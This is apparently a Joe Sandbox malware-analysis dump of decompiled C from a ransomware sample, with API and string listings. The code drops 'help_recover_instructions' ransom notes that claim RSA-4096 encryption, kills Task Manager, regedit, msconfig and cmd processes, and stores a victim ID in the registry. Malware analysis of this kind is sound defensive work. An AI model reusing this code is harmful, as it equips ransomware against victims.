								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E0042D15F(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										_t23 =  *_t37( *0x440e90,  *0x43fbcc, _t43); // executed
										__eflags =  *_t23();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E0042A8D8(_t30, _t35, _t37, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E0042A89B();
					return 0;
				}
			}

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00426BF2), ref: 0042AB56
GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00426BF2), ref: 0042AB78
GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00426BF2), ref: 0042AB85
GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00426BF2), ref: 0042AB92
GetProcAddress.KERNEL32(00000000,FlsFree,?,00426BF2), ref: 0042AB9F
TlsAlloc.KERNEL32(?,00426BF2), ref: 0042ABEF
TlsSetValue.KERNEL32(00000000,?,00426BF2), ref: 0042AC0A
EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC25
EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC32
EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC3F
EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC4C

Part of subcall function 0042B881: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 0042B8A9

DecodePointer.KERNEL32(0042AA1F,?,00426BF2), ref: 0042AC6D

Part of subcall function 0042D15F: Sleep.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 0042D187

DecodePointer.KERNEL32(00000000,?,00426BF2), ref: 0042AC9C

Part of subcall function 0042A8D8: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043C1F0,00000008,0042A9E0,00000000,00000000,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C), ref: 0042A8E9
Part of subcall function 0042A8D8: InterlockedIncrement.KERNEL32(0043F460), ref: 0042A92A

GetCurrentThreadId.KERNEL32(?,00426BF2), ref: 0042ACAE

Part of subcall function 0042A89B: DecodePointer.KERNEL32(00000004,0042ACC4,?,00426BF2), ref: 0042A8AC
Part of subcall function 0042A89B: TlsFree.KERNEL32(0000001B,0042ACC4,?,00426BF2), ref: 0042A8C6
Part of subcall function 0042A89B: DeleteCriticalSection.KERNEL32(00000000,00000000,77CFA295,?,0042ACC4,?,00426BF2), ref: 0042B8E8
Part of subcall function 0042A89B: DeleteCriticalSection.KERNEL32(0000001B,77CFA295,?,0042ACC4,?,00426BF2), ref: 0042B912

Strings

FlsFree, xrefs: 0042AB94
KERNEL32.DLL, xrefs: 0042AB51
FlsAlloc, xrefs: 0042AB72
FlsSetValue, xrefs: 0042AB87
FlsGetValue, xrefs: 0042AB7A

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 00413500, Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 185

C-Code - Quality: 82%

			E00413500(char _a4) {
				signed int _v8;
				char _v8198;
				short _v8200;
				long _v8204;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				wchar_t* _t28;
				intOrPtr* _t30;
				intOrPtr* _t38;
				intOrPtr* _t41;
				wchar_t* _t45;
				intOrPtr* _t47;
				intOrPtr* _t50;
				intOrPtr* _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t67;
				signed int _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;

				E0042E220(0x2008);
				_t24 =  *0x43f054; // 0xd6baf341
				_v8 = _t24 ^ _t68;
				_t2 =  &_a4; // 0x413d3a
				_t45 =  *_t2;
				_v8204 = 0;
				_v8200 = 0;
				E0042D0A0( &_v8198, 0, 0x1ffe);
				_t70 = _t69 + 0xc;
				_t47 = 0x476238;
				_t28 = _t45;
				while(1) {
					_t57 =  *_t28;
					if(_t57 !=  *_t47) {
						break;
					}
					if(_t57 == 0) {
						L5:
						_t28 = 0;
					} else {
						_t57 = _t28[0];
						if(_t57 !=  *((intOrPtr*)(_t47 + 2))) {
							break;
						} else {
							_t28 =  &(_t28[1]);
							_t47 = _t47 + 4;
							if(_t57 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
					}
					L7:
					if(_t28 != 0) {
						_t50 = 0x470238;
						_t28 = _t45;
						while(1) {
							_t57 =  *_t28;
							if(_t57 !=  *_t50) {
								break;
							}
							if(_t57 == 0) {
								L13:
								_t28 = 0;
							} else {
								_t57 = _t28[0];
								if(_t57 !=  *((intOrPtr*)(_t50 + 2))) {
									break;
								} else {
									_t28 =  &(_t28[1]);
									_t50 = _t50 + 4;
									if(_t57 != 0) {
										continue;
									} else {
										goto L13;
									}
								}
							}
							L15:
							if(_t28 != 0) {
								_t51 = 0x47e238;
								_t28 = _t45;
								while(1) {
									_t57 =  *_t28;
									if(_t57 !=  *_t51) {
										break;
									}
									if(_t57 == 0) {
										L21:
										_t28 = 0;
									} else {
										_t57 = _t28[0];
										if(_t57 !=  *((intOrPtr*)(_t51 + 2))) {
											break;
										} else {
											_t28 =  &(_t28[1]);
											_t51 = _t51 + 4;
											if(_t57 != 0) {
												continue;
											} else {
												goto L21;
											}
										}
									}
									L23:
									if(_t28 != 0) {
										_push(_t64);
										_t28 = wcsstr(_t45, "Desktop");
										_t71 = _t70 + 8;
										if(_t28 == 0) {
											_t30 = 0x474238;
											_t57 = 0x47423a;
											do {
												_t52 =  *_t30;
												_t30 = _t30 + 2;
											} while (_t52 != 0);
											if(_t30 == 0x47423a) {
												L29:
												_push(_t62);
												_push("uuk");
												_push(L"help_recover_instructions");
												E00414300(0x1000,  &_v8200, L"%s\\%s+%s.txt", _t45);
												_t66 = E004134D0( &_v8200);
												_t72 = _t71 + 0x18;
												if(_t66 != 0xffffffff) {
													_t41 = 0x462918;
													do {
														_t55 =  *_t41;
														_t41 = _t41 + 1;
													} while (_t55 != 0);
													E00414330(0x462919, _t66, " __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!  NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo", _t41 - 0x462919,  &_v8204); // executed
													_t72 = _t72 + 0x10;
													CloseHandle(_t66);
												}
												_push("uuk");
												_push(L"help_recover_instructions");
												_t57 = 0x1000;
												E00414300(0x1000,  &_v8200, L"%s\\%s+%s.html", _t45);
												_t28 = CreateFileW( &_v8200, 0x40000000, 0, 0, 4, 0x80, 0); // executed
												_t67 = _t28;
												if(_t67 != 0xffffffff) {
													_t38 = 0x4665a8;
													_t57 = 0x4665a9;
													do {
														_t53 =  *_t38;
														_t38 = _t38 + 1;
													} while (_t53 != 0);
													E00414330(0x4665a9, _t67, "<html><!-- 72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <style>a { color:green; }.tb {  background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:", _t38 - 0x4665a9,  &_v8204); // executed
													_t28 = CloseHandle(_t67);
												}
												_pop(_t62);
											} else {
												_t28 = wcsstr(_t45, "Public Desktop");
												_t71 = _t71 + 8;
												if(_t28 == 0) {
													goto L29;
												}
											}
										}
										_pop(_t64);
									}
									goto L39;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L23;
							}
							goto L39;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L15;
					}
					L39:
					return E004256FE(_t28, _t45, _v8 ^ _t68, _t57, _t62, _t64);
				}
				asm("sbb eax, eax");
				asm("sbb eax, 0xffffffff");
				goto L7;
			}

0x0041350a
0x0041350f
0x00413516
0x0041351a
0x0041351a
0x0041352c
0x00413536
0x0041353d
0x00413542
0x00413545
0x0041354a
0x00413550
0x00413550
0x00413556
0x00000000
0x00000000
0x0041355b
0x00413572
0x00413572
0x0041355d
0x0041355d
0x00413565
0x00000000
0x00413567
0x00413567
0x0041356a
0x00413570
0x00000000
0x00000000
0x00000000
0x00000000
0x00413570
0x00413565
0x0041357b
0x0041357d
0x00413583
0x00413588
0x00413590
0x00413590
0x00413596
0x00000000
0x00000000
0x0041359b
0x004135b2
0x004135b2
0x0041359d
0x0041359d
0x004135a5
0x00000000
0x004135a7
0x004135a7
0x004135aa
0x004135b0
0x00000000
0x00000000
0x00000000
0x00000000
0x004135b0
0x004135a5
0x004135bb
0x004135bd
0x004135c3
0x004135c8
0x004135d0
0x004135d0
0x004135d6
0x00000000
0x00000000
0x004135db
0x004135f2
0x004135f2
0x004135dd
0x004135dd
0x004135e5
0x00000000
0x004135e7
0x004135e7
0x004135ea
0x004135f0
0x00000000
0x00000000
0x00000000
0x00000000
0x004135f0
0x004135e5
0x004135fb
0x004135fd
0x00413603
0x00413610
0x00413612
0x00413617
0x0041361d
0x00413622
0x00413625
0x00413625
0x00413628
0x0041362b
0x00413634
0x00413649
0x00413649
0x0041364a
0x0041364f
0x00413666
0x0041367d
0x0041367f
0x00413685
0x00413687
0x00413690
0x00413690
0x00413692
0x00413693
0x004136a7
0x004136ac
0x004136b0
0x004136b0
0x004136b2
0x004136b7
0x004136c9
0x004136ce
0x004136ef
0x004136f5
0x004136fa
0x004136fc
0x00413701
0x00413704
0x00413704
0x00413706
0x00413707
0x0041371b
0x00413724
0x00413724
0x00413726
0x00413636
0x0041363c
0x0041363e
0x00413643
0x00000000
0x00000000
0x00413643
0x00413634
0x00413727
0x00413727
0x00000000
0x004135fd
0x004135f6
0x004135f8
0x00000000
0x004135f8
0x00000000
0x004135bd
0x004135b6
0x004135b8
0x00000000
0x004135b8
0x00413728
0x00413736
0x00413736
0x00413576
0x00413578
0x00000000

APIs

wcsstr.NTDLL ref: 00413610
wcsstr.NTDLL ref: 0041363C

Part of subcall function 004134D0: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,help_recover_instructions,uuk,00442040,?,?,?,?,?), ref: 004134FC

CloseHandle.KERNEL32(00000000), ref: 004136B0
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 004136EF

Part of subcall function 00414330: WriteFile.KERNEL32(?,?,00000000, 7A,00000000,<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:,<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:,?), ref: 00414358

CloseHandle.KERNEL32(00000000), ref: 00413724

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

uuk, xrefs: 0041364A, 004136B2
<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:, xrefs: 004136FC, 00413714, 00413715
%s\%s+%s.txt, xrefs: 0041365B
C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\Burn, xrefs: 004135C3
C:\Users\admin\Desktop, xrefs: 00413583
Desktop, xrefs: 0041360A
__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo, xrefs: 00413687, 004136A0, 004136A1
C:\Users\Public\Desktop, xrefs: 00413545
Public Desktop, xrefs: 0041361D, 00413636
%s\%s+%s.html, xrefs: 004136C3
:=A, xrefs: 0041351A, 0041360F, 0041363B, 00413654, 004136BC
help_recover_instructions, xrefs: 0041364F, 004136B7

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 00413500, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 185

C-Code - Quality: 83%

			E00413500(char _a4) {
				signed int _v8;
				char _v8198;
				short _v8200;
				long _v8204;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				wchar_t* _t28;
				intOrPtr* _t30;
				intOrPtr* _t38;
				intOrPtr* _t41;
				wchar_t* _t45;
				intOrPtr* _t47;
				intOrPtr* _t50;
				intOrPtr* _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t67;
				signed int _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;

				E0042E220(0x2008);
				_t24 =  *0x43f054; // 0xd6baf341
				_v8 = _t24 ^ _t68;
				_t2 =  &_a4; // 0x413d3a
				_t45 =  *_t2;
				_v8204 = 0;
				_v8200 = 0;
				E0042D0A0( &_v8198, 0, 0x1ffe);
				_t70 = _t69 + 0xc;
				_t47 = 0x476238;
				_t28 = _t45;
				while(1) {
					_t57 =  *_t28;
					if(_t57 !=  *_t47) {
						break;
					}
					if(_t57 == 0) {
						L5:
						_t28 = 0;
					} else {
						_t57 = _t28[0];
						if(_t57 !=  *((intOrPtr*)(_t47 + 2))) {
							break;
						} else {
							_t28 =  &(_t28[1]);
							_t47 = _t47 + 4;
							if(_t57 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
					}
					L7:
					if(_t28 != 0) {
						_t50 = 0x470238;
						_t28 = _t45;
						while(1) {
							_t57 =  *_t28;
							if(_t57 !=  *_t50) {
								break;
							}
							if(_t57 == 0) {
								L13:
								_t28 = 0;
							} else {
								_t57 = _t28[0];
								if(_t57 !=  *((intOrPtr*)(_t50 + 2))) {
									break;
								} else {
									_t28 =  &(_t28[1]);
									_t50 = _t50 + 4;
									if(_t57 != 0) {
										continue;
									} else {
										goto L13;
									}
								}
							}
							L15:
							if(_t28 != 0) {
								_t51 = 0x47e238;
								_t28 = _t45;
								while(1) {
									_t57 =  *_t28;
									if(_t57 !=  *_t51) {
										break;
									}
									if(_t57 == 0) {
										L21:
										_t28 = 0;
									} else {
										_t57 = _t28[0];
										if(_t57 !=  *((intOrPtr*)(_t51 + 2))) {
											break;
										} else {
											_t28 =  &(_t28[1]);
											_t51 = _t51 + 4;
											if(_t57 != 0) {
												continue;
											} else {
												goto L21;
											}
										}
									}
									L23:
									if(_t28 != 0) {
										_push(_t64);
										_t28 = wcsstr(_t45, "Desktop");
										_t71 = _t70 + 8;
										if(_t28 == 0) {
											_t30 = 0x474238;
											_t57 = 0x47423a;
											do {
												_t52 =  *_t30;
												_t30 = _t30 + 2;
											} while (_t52 != 0);
											if(_t30 == 0x47423a) {
												L29:
												_push(_t62);
												_push(0x442000);
												_push(L"help_recover_instructions");
												E00414300(0x1000,  &_v8200, L"%s\\%s+%s.txt", _t45);
												_t66 = E004134D0( &_v8200);
												_t72 = _t71 + 0x18;
												if(_t66 != 0xffffffff) {
													_t41 = 0x462918;
													_t15 = _t41 + 1; // 0x462919
													_t61 = _t15;
													do {
														_t55 =  *_t41;
														_t41 = _t41 + 1;
													} while (_t55 != 0);
													E00414330(_t61, _t66, 0x462918, _t41 - _t61,  &_v8204); // executed
													_t72 = _t72 + 0x10;
													CloseHandle(_t66);
												}
												_push(0x442000);
												_push(L"help_recover_instructions");
												_t57 = 0x1000;
												E00414300(0x1000,  &_v8200, L"%s\\%s+%s.html", _t45);
												_t28 = CreateFileW( &_v8200, 0x40000000, 0, 0, 4, 0x80, 0); // executed
												_t67 = _t28;
												if(_t67 != 0xffffffff) {
													_t38 = 0x4665a8;
													_t19 = _t38 + 1; // 0x4665a9
													_t57 = _t19;
													do {
														_t53 =  *_t38;
														_t38 = _t38 + 1;
													} while (_t53 != 0);
													E00414330(_t57, _t67, 0x4665a8, _t38 - _t57,  &_v8204); // executed
													_t28 = CloseHandle(_t67);
												}
												_pop(_t62);
											} else {
												_t28 = wcsstr(_t45, "Public Desktop");
												_t71 = _t71 + 8;
												if(_t28 == 0) {
													goto L29;
												}
											}
										}
										_pop(_t64);
									}
									goto L39;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L23;
							}
							goto L39;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L15;
					}
					L39:
					return E004256FE(_t28, _t45, _v8 ^ _t68, _t57, _t62, _t64);
				}
				asm("sbb eax, eax");
				asm("sbb eax, 0xffffffff");
				goto L7;
			}

0x0041350a
0x0041350f
0x00413516
0x0041351a
0x0041351a
0x0041352c
0x00413536
0x0041353d
0x00413542
0x00413545
0x0041354a
0x00413550
0x00413550
0x00413556
0x00000000
0x00000000
0x0041355b
0x00413572
0x00413572
0x0041355d
0x0041355d
0x00413565
0x00000000
0x00413567
0x00413567
0x0041356a
0x00413570
0x00000000
0x00000000
0x00000000
0x00000000
0x00413570
0x00413565
0x0041357b
0x0041357d
0x00413583
0x00413588
0x00413590
0x00413590
0x00413596
0x00000000
0x00000000
0x0041359b
0x004135b2
0x004135b2
0x0041359d
0x0041359d
0x004135a5
0x00000000
0x004135a7
0x004135a7
0x004135aa
0x004135b0
0x00000000
0x00000000
0x00000000
0x00000000
0x004135b0
0x004135a5
0x004135bb
0x004135bd
0x004135c3
0x004135c8
0x004135d0
0x004135d0
0x004135d6
0x00000000
0x00000000
0x004135db
0x004135f2
0x004135f2
0x004135dd
0x004135dd
0x004135e5
0x00000000
0x004135e7
0x004135e7
0x004135ea
0x004135f0
0x00000000
0x00000000
0x00000000
0x00000000
0x004135f0
0x004135e5
0x004135fb
0x004135fd
0x00413603
0x00413610
0x00413612
0x00413617
0x0041361d
0x00413622
0x00413625
0x00413625
0x00413628
0x0041362b
0x00413634
0x00413649
0x00413649
0x0041364a
0x0041364f
0x00413666
0x0041367d
0x0041367f
0x00413685
0x00413687
0x0041368c
0x0041368c
0x00413690
0x00413690
0x00413692
0x00413693
0x004136a7
0x004136ac
0x004136b0
0x004136b0
0x004136b2
0x004136b7
0x004136c9
0x004136ce
0x004136ef
0x004136f5
0x004136fa
0x004136fc
0x00413701
0x00413701
0x00413704
0x00413704
0x00413706
0x00413707
0x0041371b
0x00413724
0x00413724
0x00413726
0x00413636
0x0041363c
0x0041363e
0x00413643
0x00000000
0x00000000
0x00413643
0x00413634
0x00413727
0x00413727
0x00000000
0x004135fd
0x004135f6
0x004135f8
0x00000000
0x004135f8
0x00000000
0x004135bd
0x004135b6
0x004135b8
0x00000000
0x004135b8
0x00413728
0x00413736
0x00413736
0x00413576
0x00413578
0x00000000

APIs

wcsstr.NTDLL ref: 00413610
wcsstr.NTDLL ref: 0041363C

Part of subcall function 004134D0: CreateFileW.KERNEL32(00442000,40000000,00000000,00000000,00000004,00000080,00000000,help_recover_instructions,00442000,00442040,?,?,?,?,?), ref: 004134FC

CloseHandle.KERNEL32(00000000), ref: 004136B0
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 004136EF

Part of subcall function 00414330: WriteFile.KERNEL32(004665A9,004665A8,00000000, 7A,00000000,004665A8,004665A9,?), ref: 00414358

CloseHandle.KERNEL32(00000000), ref: 00413724

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

C:\Users\admin\Desktop, xrefs: 00413583
%s\%s+%s.html, xrefs: 004136C3
C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\Burn, xrefs: 004135C3
%s\%s+%s.txt, xrefs: 0041365B
Public Desktop, xrefs: 0041361D, 00413636
Desktop, xrefs: 0041360A
help_recover_instructions, xrefs: 0041364F, 004136B7
C:\Users\Public\Desktop, xrefs: 00413545
:=A, xrefs: 0041351A, 0041360F, 0041363B, 00413654, 004136BC

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041FF20, Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 162

C-Code - Quality: 63%

			E0041FF20(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v8198;
				long _v8200;
				char _v88200;
				unsigned int _v88204;
				long _v88208;
				unsigned int _v88212;
				signed int _t28;
				char* _t37;
				unsigned int _t39;
				intOrPtr* _t42;
				intOrPtr* _t44;
				intOrPtr* _t47;
				wchar_t* _t52;
				intOrPtr* _t53;
				wchar_t* _t55;
				wchar_t* _t57;
				wchar_t* _t58;
				wchar_t* _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t75;
				signed int _t76;
				void* _t77;
				void* _t78;
				void* _t80;
				void* _t81;

				_t73 = __esi;
				_t71 = __edi;
				_t60 = __ebx;
				E0042E220(0x15894);
				_t28 =  *0x43f054; // 0xd6baf341
				_v8 = _t28 ^ _t76;
				_v8200 = 0;
				E0042D0A0( &_v8198, 0, 0x1ffe);
				_t78 = _t77 + 0xc;
				_v88208 = GetCurrentProcessId();
				if( *0x46a234 != 0) {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					do {
						_t69 =  &_v88212;
						_t37 =  &_v88200;
						__imp__EnumProcesses(_t37, 0x9c40,  &_v88212); // executed
						if(_t37 != 0) {
							_t39 = _v88212 >> 2;
							_t61 = 0;
							_v88204 = _t39;
							if(_t39 != 0) {
								do {
									_t74 =  *((intOrPtr*)(_t76 + _t61 * 4 - 0x15884));
									if(_t74 != _v88208 && _t74 != 0) {
										_t42 = E00413000(_t69, 0, 1, 0x99a4299d);
										_t80 = _t78 + 0xc;
										_t75 =  *_t42(0x2000030, 0, _t74);
										if(_t75 == 0) {
											L17:
											_t44 = E00413000(_t69, 0, 1, 0x723eb0d5);
											_t78 = _t80 + 0xc;
											 *_t44(_t75);
										} else {
											E0042D0A0( &_v8200, 0, 0x2000);
											_t78 = _t80 + 0xc;
											__imp__GetProcessImageFileNameW(_t75,  &_v8200, 0x1000); // executed
											_t47 =  &_v8200;
											_t69 = _t47 + 2;
											do {
												_t66 =  *_t47;
												_t47 = _t47 + 2;
											} while (_t66 != 0);
											if(_t47 != _t69) {
												E0042614E( &_v8200, 0x1000); // executed
												_t52 = wcsstr( &_v8200, L"askmg");
												_t81 = _t78 + 0x10;
												if(_t52 != 0) {
													L16:
													_t53 = E00413000(_t69, 0, 1, 0x9e6fa842);
													_t80 = _t81 + 0xc;
													 *_t53(_t75, 0);
												} else {
													_t69 =  &_v8200;
													_t55 = wcsstr( &_v8200, L"rocex");
													_t81 = _t81 + 8;
													if(_t55 != 0) {
														goto L16;
													} else {
														_t57 = wcsstr( &_v8200, L"egedi");
														_t81 = _t81 + 8;
														if(_t57 != 0) {
															goto L16;
														} else {
															_t58 = wcsstr( &_v8200, L"sconfi");
															_t81 = _t81 + 8;
															if(_t58 != 0) {
																goto L16;
															} else {
																_t69 =  &_v8200;
																_t59 = wcsstr( &_v8200, L"cmd");
																_t80 = _t81 + 8;
																if(_t59 != 0) {
																	goto L16;
																}
															}
														}
													}
												}
												goto L17;
											}
										}
										_t39 = _v88204;
									}
									_t61 = _t61 + 1;
								} while (_t61 < _t39);
							}
							E0042D0A0( &_v88200, 0, 0x13880);
							_t78 = _t78 + 0xc;
							Sleep(0xc8); // executed
						}
					} while ( *0x46a234 != 0);
					_pop(_t71);
					_pop(_t73);
					_pop(_t60);
				}
				 *((intOrPtr*)(E00413000(_t69, 0, 1, 0x768aa260)))();
				return E004256FE(1, _t60, _v8 ^ _t76, _t69, _t71, _t73, 0xffffffff);
			}

APIs

GetCurrentProcessId.KERNEL32 ref: 0041FF57
K32EnumProcesses.KERNEL32(?,00009C40,?), ref: 0041FF93
K32GetProcessImageFileNameW.KERNEL32(00000000,?,00001000), ref: 00420023
wcsstr.NTDLL ref: 00420064
wcsstr.NTDLL ref: 00420079
wcsstr.NTDLL ref: 0042008E
wcsstr.NTDLL ref: 004200A3
wcsstr.NTDLL ref: 004200B8
Sleep.KERNELBASE(000000C8), ref: 00420115

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

egedi, xrefs: 00420088
rocex, xrefs: 00420073
sconfi, xrefs: 0042009D
askmg, xrefs: 0042005E
cmd, xrefs: 004200B2

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 00401230, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 178

C-Code - Quality: 65%

			E00401230(void* __ebx) {
				signed int _v8;
				char _v54;
				char _v56;
				void* _v60;
				int _v64;
				int _v68;
				void* __edi;
				void* __esi;
				signed int _t25;
				long _t29;
				long _t32;
				intOrPtr _t43;
				intOrPtr* _t44;
				short _t92;
				intOrPtr _t93;
				signed int _t94;
				void* _t95;
				void* _t96;

				_t61 = __ebx;
				_t25 =  *0x43f054; // 0xd6baf341
				_v8 = _t25 ^ _t94;
				_v60 = 0;
				_v64 = 8;
				_v56 = 0;
				E0042D0A0( &_v54, 0, 0x2e);
				_t93 = __imp__RegCreateKeyExW; // 0x7634407e
				_t96 = _t95 + 0xc;
				_t29 = RegCreateKeyExW(0x80000003, L"\\S-1-5-18\\Software\\xxxsys\\", 0, 0, 0, 0x20019, 0,  &_v60, 0);
				_t92 = "-F4voH4v~@4v"; // 0x7634462d
				if(_t29 != 0 || RegQueryValueExW(_v60, L"ID", 0,  &_v68, 0x441d20,  &_v64) != 0) {
					RegCreateKeyExW(0x80000001, L"Software\\xxxsys\\", 0, 0, 0, 0x2001f, 0,  &_v60, 0); // executed
					_t32 = RegQueryValueExW(_v60, L"ID", 0,  &_v68, 0x441d20,  &_v64); // executed
					if(_t32 != 0) {
						_t43 =  *0x462890; // 0x440288
						if(_t43 == 0) {
							_t43 = 0x440288;
							 *0x462890 = 0x440288;
						}
						_t18 = _t43 + 4; // 0x41c850
						_t44 =  *_t18;
						if(_t44 != 0) {
							 *_t44(0x441d20, 8); // executed
							_t96 = _t96 + 8;
						}
						RegSetValueExW(_v60, L"ID", 0, 3, 0x441d20, 8); // executed
						RegFlushKey(_v60);
					}
					_push( *0x441d23 & 0x000000ff);
					_push( *0x441d22 & 0x000000ff);
					_push( *0x441d21 & 0x000000ff);
					E00401D10(0x18, "AA6A331C729CA1F", L"%X%X%X%X",  *0x441d20 & 0x000000ff);
					_push( *0x441d27 & 0x000000ff);
					_push( *0x441d26 & 0x000000ff);
					E00401D10(0x18,  &_v56, L"%X%X%X%X",  *0x441d24 & 0x000000ff);
					E00425ACD("AA6A331C729CA1F", 0x18,  &_v56);
					RegCloseKey(_v60);
					return E004256FE(0, _t61, _v8 ^ _t94,  &_v56, _t92, _t93,  *0x441d25 & 0x000000ff);
				} else {
					_push( *0x441d23 & 0x000000ff);
					_push( *0x441d22 & 0x000000ff);
					_push( *0x441d21 & 0x000000ff);
					E00401D10(0x18, "AA6A331C729CA1F", L"%X%X%X%X",  *0x441d20 & 0x000000ff);
					_push( *0x441d27 & 0x000000ff);
					_push( *0x441d26 & 0x000000ff);
					E00401D10(0x18,  &_v56, L"%X%X%X%X",  *0x441d24 & 0x000000ff);
					E00425ACD("AA6A331C729CA1F", 0x18,  &_v56);
					RegCloseKey(_v60);
					return E004256FE(1, __ebx, _v8 ^ _t94, 0x18, _t92, _t93,  *0x441d25 & 0x000000ff);
				}
			}

0x00401230
0x00401238
0x0040123f
0x0040124d
0x00401254
0x0040125b
0x0040125f
0x00401264
0x0040126a
0x0040128a
0x0040128c
0x00401294
0x00401372
0x0040138c
0x00401390
0x00401392
0x00401399
0x0040139b
0x004013a0
0x004013a0
0x004013a5
0x004013a5
0x004013aa
0x004013b3
0x004013b5
0x004013b5
0x004013cc
0x004013d6
0x004013d6
0x004013f1
0x004013f9
0x004013fa
0x0040140b
0x00401425
0x0040142d
0x0040143e
0x0040144e
0x0040145a
0x00401471
0x004012bc
0x004012d1
0x004012d9
0x004012da
0x004012eb
0x00401305
0x0040130d
0x0040131e
0x0040132e
0x0040133a
0x00401354
0x00401354

APIs

